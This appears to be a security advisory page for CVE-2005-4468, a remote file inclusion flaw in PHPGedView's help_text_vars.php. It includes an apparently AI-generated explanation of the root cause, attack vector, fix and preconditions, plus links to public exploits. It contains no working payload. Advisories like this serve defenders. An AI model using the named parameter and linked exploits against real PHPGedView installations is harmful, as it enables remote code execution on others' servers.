VYPR
← All advisories
Unrated severityNVD Advisory· Published Dec 22, 2005· Updated Jun 16, 2026

CVE-2005-4468

CVE-2005-4468

Description

PHP remote file include vulnerability in help_text_vars.php in PHPGedView 3.3.7 and earlier allows remote attackers to execute arbitrary code via a URL in the PGV_BASE_DIRECTORY parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Patches

Vulnerability mechanics

Root cause

"The application fails to properly sanitize user-supplied input in the PGV_BASE_DIRECTORY parameter, allowing for remote file inclusion."

Attack vector

A remote attacker can send a crafted URL to the `help_text_vars.php` script. This URL includes a `PGV_BASE_DIRECTORY` parameter containing a malicious path to a remote file. When the script processes this parameter without proper validation, it can be tricked into including and executing arbitrary code from the specified remote location [ref_id=1].

Affected code

The vulnerability exists in the `help_text_vars.php` file in PHPGedView version 3.3.7 and earlier [ref_id=1].

What the fix does

The patch updates the `help_text_vars.php` file to include proper validation for the `PGV_BASE_DIRECTORY` parameter [ref_id=1]. This prevents the script from including arbitrary remote files, thereby mitigating the remote file inclusion vulnerability and stopping attackers from executing arbitrary code.

Preconditions

  • inputThe attacker must be able to control the value of the `PGV_BASE_DIRECTORY` parameter.
  • networkThe vulnerable script must be accessible over the network.

Reproduction

The following public exploit references demonstrate how to reproduce this vulnerability: - http://rgod.altervista.org/phpgedview_337_xpl.html - http://www.securityfocus.com/bid/15983

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

10

News mentions

0

No linked articles in our index yet.